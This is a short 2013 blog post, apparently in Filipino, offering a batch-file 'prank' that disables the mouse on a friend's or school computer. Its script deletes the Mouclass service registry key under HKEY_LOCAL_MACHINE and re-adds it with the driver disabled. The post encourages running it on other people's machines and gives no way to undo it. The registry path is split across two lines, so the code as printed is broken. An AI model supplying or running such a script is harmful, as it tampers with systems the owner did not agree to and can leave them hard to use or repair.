Huwebes, Nobyembre 28, 2013

How to Disable your mouse.

Note: Dont do this to your own PC.
It is just an easy prank joke for your friends or in school.
1. Create a new text document.
2. Copy and Paste the Code below.
3. Save it as anyfilename.bat
4. Open the .bat file and your mouse will be disabled.



rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControl
Set\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Walang komento:

Mag-post ng isang Komento